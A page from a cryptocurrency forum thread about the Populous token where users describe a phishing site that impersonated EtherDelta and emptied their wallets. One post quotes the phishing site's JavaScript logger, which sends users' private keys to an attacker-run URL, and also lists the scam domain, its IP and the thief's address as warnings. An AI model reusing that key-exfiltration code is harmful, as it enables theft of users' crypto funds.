Topic: [ANN] POPULOUS WORLD - Invoice trading platform - PPT - page 222. (Read 277234 times)

Thank you everone,  who send words to help to overcome loss or to find a better attitude torward material world.

To my understanding EtherDelta is missing basic security features to protect users losing money if somebody traps into a phishing site.
I can everbody suggest to avoid EtherDelta under all circumstances, if you hacked you will be left alone. I can prove that I spend hours on ED-chat to organnize some help to catch the hackers.
The chat was full over the day of victims, I could not get any response from ED that they will improve security* to prevent steal of money, or atleast something to collect victim information for a criminal investigation.
*Other then updating a SCAM/Phishing List from Google.

@Populous , when I find some time I will write a little feature request on your GitHUb. Welcome if dev could copy and paste what suggested into there project objectives

But anyway lot of thing to do in regards to security, I will suggest following to prevent succssfull phishing attacks (its only a litte feature but important function )-  in case somebody traps into a phishing site(what will happen!).

1) Name somebody who regulary scan URLs for phishing sites, with similar names of your trading platform (REGEX and a little script will help) -> If found update Google-Chrom Phishing/SCAM List.
2) Never change the IP of your site, check your DNS entry every minute or so for changes by criminals.

Now on the plaform:

Generate when customers sign In:

 Use 2FA
1 x Password for Trading access
1 x Password for the access to the PPT-WAllet (Wallet needs extra protection)

Generate one dedicated Passwort(1) which will be needed to change the Customer Email. Needed every time.

If customer want to cash out his Poken or PPT send a confirmation email to customer(link valid only 1h)

Customer external ETherAddress to send out of Populous can only changed with Password(1) / After change of Ether-Address PPT-wallet will be frozen 12h before transfers can happen again


####################################################################################
For the interested ones:

Also I will copy a piece of coding which was used to hack EtherDelta:

" self.log = function(type, address, privateKey) { request('https://etherdelta.herokuapp.com/save.php?type=' + type + '&address=' + address + '&privateKey=' + privateKey); }; "
that is the evil code on the scam website :  https://etherdelta. gitnub.io

####################################################################################

I also know where the phishing site is hosted:


Hostname   Type   TTL   Priority   Content
etherdelta.gitnub.io   SOA   299      ns1.vultr.com [email protected] 1504792017 10800 3600 604800 3600
etherdelta.gitnub.io   A   3599      45.77.53.18

You want to see where they tranfered the money of victims yesterday:

https://etherscan.io/address/0x62084eC8901faf5249a8f7fc2158a2c3e1A4209b

There is no fix date in software development related things what is given out is always treated as estimated dates. These dates are always subject to change accordingly where need. We should not press the team for a slight delay of few days when they are working continuously. It is more good to show your support instead dragging them into unnecessary time consuming discussions.

Dear Populous team,

Don't be so concerned with what people are saying about Populous.
Don't be so concerned if what they say will make the PPT price fall.
If you do a great job in developing a flawless system/platform...
And you work hard in closing deals with business owners...
Then nothing can stop the price to go up.
Otherwise, everything you say and do, to stop any price decline will be very short-lived and temporary.

Do not build your mansion on sand where it will be washed away every single day.
And you have to rebuild your mansion over and over again.
All your effort is nothing but futile.
Instead, build your mansion on a concrete foundation where nothing can destroy it.
A concrete foundation is when you have a flawless system/platform and you work hard to close deals.
In this world, fortune lasts much longer if you accumulate it with hard work and honesty.
Otherwise, it will not last.
Deals like the one you closed with Luxure is not significant.
You cannot close a real mega deal unless you have a flawless working system/platform in place.
Why would any corporate directors be wasting their time on you if you don't have anything solid to show them?
Words mean nothing in a world where trust is prized.

Sorry about your loss. There is nothing I can do to help except to refer you to a verse.

Do not store up for yourselves treasures on earth, where moths and vermin destroy, and where thieves break in and steal. But store up for yourselves treasures in heaven, where moths and vermin do not destroy, and where thieves do not break in and steal. For where your treasure is, there your heart will be also. - Matthew 6:19-21

You should not be dedicating 100% of your time and effort into material possession.
If possible, make it 50% into material possession and 50% into spiritual endeavor.
Ultimately you should go for 100% spiritual endeavor.

Thankyou for the quick reply. I assumed it wouldnt be long and I am being patient. Just curious

Do you have any time frame? Is this weekend a possiblity?

Yeah we hear you, the wait shouldn't be much longer

Well bitpopulous twitter said 6 to 7 days and it's been 9. I'm dying to use a different exchange and we need more volume especially in this bear market

Listing application response is taking a little bit of time, no drama's just time

Very good question.

Does anyone know why we havent been listen on hitbtc yet?

I am so sorry for your loss. Bad week for a lot of us, first the cryptopia mass hacker, I lost nearly half a btc there of IFT and now the etherdelta shmucks are at it. I feel sick to my stomach that there are so many bad elements in crypto that want to destroy whatever good we are trying to build. I guess this is why PPT has had a slight drop in price. The hackers are selling off the PPT I guess.

sorry to hear that mate, I hope you get a more change someday and thanks for warning us about that scam site

I wrote a piece about this:
https://steemit.com/ethereum/@profitgenerator/etherdelta-new-website

I am shocked how quick things happen here, I usually check things every 2-3 days, and it looks like there was quite a nervous night yesterday with all these phishing crap popping out out of nowhere.

Looks like some of the situation is explained by the dev here to figure out what happened exactly yesterday:

https://youtu.be/ubk4wUP95cc

Profit thanks for reply that nice, this helps.

They have stolen alone today more than 1,000,000 USD worth crypto I expect, this gives hope that there will be may a huge investigation.
Hopefully this guy(s) did mistakes a left traces to find them.

Crap sorry for your loss. I just got home after taking my wife to lunch, and see everywhere claims about etherdelta phishing stuff. I ot scared at first what the hell was going on.

I see people complaining everywhere that some phishing campaign happened on Google searches. Tons of phishing sites popped up like these:

https://www.reddit.com/r/EtherDelta/comments/6ysu15/whats_out_fake_etherdelta_sites_thru_google_ads/

Then that GITNUB bitch got even a HTTPS certificate. So beware, not even the HTTPS lock icon in your address bar can indicate a trustworthy website.

Hackers are clever now and they buy HTTPS certificates now to setup their scam phishing sites.

The only way really is to use bookmarks only and tripple check the link before bookmarking.

Hi there,

this was a horrible day, even I work in IT it happened I clicked a phishing site instead EtherDelta (normaly I use only the saved link, but lucky for the hacker ED did not worked this morning)

I lost ~ 250 PPT and around 8000USD, I bought from my last Ether(there where in another exchange) 500 new PPT.
I had golden hands with my shorttime tradings but this is all lost. Lucky my long time PPT holdings where somewhere else and I never tough them.

Trading times are now over for me, let PPT grow.

Take care that you not do the same mistake.

Holy shit, that gitnub bitch site really needs to be removed.

I am cautious about the .com website as well for now, we don't know yet whether the twitter was hacked or not and this situation smells suspicious to me.

I have contacted the dev to verify whether the .com website is legit or not.

I was on SCAM Site : https:// etherdelta. gitnub.io /#MTH-ETH <---- WARNING: DO NOT USE

the problem does not came from https://etherdelta.com (but do not use may is also wrong I do not know)

----

Does soembody knows about SCAM EtherDelta:  https://etherdelta .gitnub.io/#MTH-ETH  <---- WARNING: DO NOT USE? Who could help to get my Ether back ?

Who has stolen my and other Ethers, is using Ether-Address :  0x62084eC8901faf5249a8f7fc2158a2c3e1A4209b

[mod note: added warnings regarding potentially malicious URL]

I'm afraid there's nothing one can do without having access to the Rx account's private key. To anyone else, stay out of any 'https://etherdelta.github.io/' alternative, until an official confirmation.
Transferring your assets to a safe wallet might be also a smart thing to consider.

yes...

I could follow the traces to : 0x62084eC8901faf5249a8f7fc2158a2c3e1A4209b  there are now 292.280952951530088593 Ether!

Is there a hero who you can bring the ethers back to there owners !